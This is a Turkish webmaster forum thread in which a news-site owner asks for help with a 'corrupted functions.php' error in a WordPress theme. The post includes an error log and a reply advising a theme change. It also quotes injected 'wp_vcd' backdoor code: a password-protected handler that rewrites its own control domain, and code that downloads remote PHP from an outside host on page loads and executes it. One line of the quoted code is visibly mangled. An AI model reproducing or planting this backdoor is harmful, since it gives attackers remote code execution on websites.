lostyazilim
tr.link

function.php hatası (eklentinin kod yüklemesi sorunu)

2 Mesajlar 1.353 Okunma
acebozum
tr.link

metesonmez metesonmez WM Aracı Kullanıcı
  • Üyelik 11.03.2017
  • Yaş/Cinsiyet 46 / E
  • Meslek gazeteci
  • Konum Muğla
  • Ad Soyad M** S**
  • Mesajlar 4
  • Beğeniler 0 / 0
  • Ticaret 0, (%0)
İnternet sitemde birden function.php hatası almaya başladı. (The file /home/muglayer/public_html/wp-content/themes/theHaberV3/functions.php is corrupted.). Hosting firması tema sağlayıcıma yönlendirdi, orası function.php'yi yeniden yüklememi söyledi, dediklerini yaptım ancak çözüm olmadı. bir eklentinin kod yüklediğini belirtiyorlar, o eklentiyi kaldır diyorlar başka da yardım etmiyorlar. Eklentilerin tamamını pasivize ettim sorun yine çözülmedi.

Eror Log'dan hatanın nedeni anlanacağını belirtmişti birisi. Ancak ben anlamadım.
Eror Log dosyası;

[19-Sep-2017 19:13:19 Europe/Istanbul] require('wp-blog-header.php'), wp, WP->main, WP->query_posts, WP_Query->query, WP_Query->get_posts, _prime_post_caches, update_post_caches, update_postmeta_cache, update_meta_cache tarafından oluşturulan SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN (10608,10610,10612,10616,10620,10648,10651,10656,10659,10662) ORDER BY meta_id ASC sorgusu için WordPress veritabanı hatası Server shutdown in progress
[19-Sep-2017 19:13:19 Europe/Istanbul] require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/theHaberV3/single.php'), include('/themes/theHaberV3/dosyalar/singleFoto.php'), include('/themes/theHaberV3/header.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, call_user_func_array, sharing_add_header, Sharing_Service->get_blog_services, get_option tarafından oluşturulan SELECT option_value FROM wp_options WHERE option_name = 'sharing-services' LIMIT 1 sorgusu için WordPress veritabanı hatası Server shutdown in progress
[19-Sep-2017 19:13:20 Europe/Istanbul] require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, call_user_func_array, of_options, update_option tarafından oluşturulan UPDATE `wp_options` SET `option_value` = NULL WHERE `option_name` = 'of_themename' sorgusu için WordPress veritabanı hatası Server shutdown in progress
[19-Sep-2017 19:13:20 Europe/Istanbul] require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/theHaberV3/single.php'), include('/themes/theHaberV3/dosyalar/singleFoto.php'), wp_get_attachment_image_src, image_downsize, wp_attachment_is_image, wp_attachment_is, get_attached_file, get_post_meta, get_metadata, update_meta_cache tarafından oluşturulan SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN (7886) ORDER BY meta_id ASC sorgusu için WordPress veritabanı hatası Server shutdown in progress
[19-Sep-2017 19:13:20 Europe/Istanbul] require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, call_user_func_array, wp_cron, spawn_cron, get_transient, get_option tarafından oluşturulan SELECT option_value FROM wp_options WHERE option_name = '_transient_timeout_doing_cron' LIMIT 1 sorgusu için WordPress veritabanı hatası Server shutdown in progress
[19-Sep-2017 19:13:20 Europe/Istanbul] require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, call_user_func_array, check_up_on_preloading, get_option tarafından oluşturulan SELECT option_value FROM wp_options WHERE option_name = 'preload_cache_counter' LIMIT 1 sorgusu için WordPress veritabanı hatası Server shutdown in progress
[19-Sep-2017 19:13:20 Europe/Istanbul] require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), do_feed, do_action('do_feed_rss2'), WP_Hook->do_action, WP_Hook->apply_filters, call_user_func_array, do_feed_rss2, load_template, require_once('wp-includes/feed-rss2.php'), the_post, WP_Query->the_post, WP_Query->setup_postdata, get_userdata, get_user_by, WP_User::get_data_by tarafından oluşturulan SELECT * FROM wp_users WHERE ID = '1' sorgusu için WordPress veritabanı hatası Server shutdown in progress


Temayı sağlayan site eklentinin şu kodu eklediğini söyledi;

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '3b256d300bfdf758141c8aa2b13a58b1'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{






case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code3\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}


}
}
}
break;



default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}




if ( ! function_exists( 'theme_temp_setup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

if($tmpcontent = @file_get_contents("http://www.dolsh.cc/code3.php?i=".$path))
{


function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

extract(theme_temp_setup($tmpcontent));
}
}
}
?>

Konu hakkında yardımcı olabilecek olan var mı?
 

 

wmaraci
reklam

dump3cz dump3cz Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 01.05.2017
  • Yaş/Cinsiyet 25 / E
  • Meslek Yazılım
  • Konum Bilecik
  • Ad Soyad O** Ç**
  • Mesajlar 1749
  • Beğeniler 169 / 326
  • Ticaret 3, (%67)
theHaberV3 Temasını değiştiriniz
 

 

wmaraci
wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al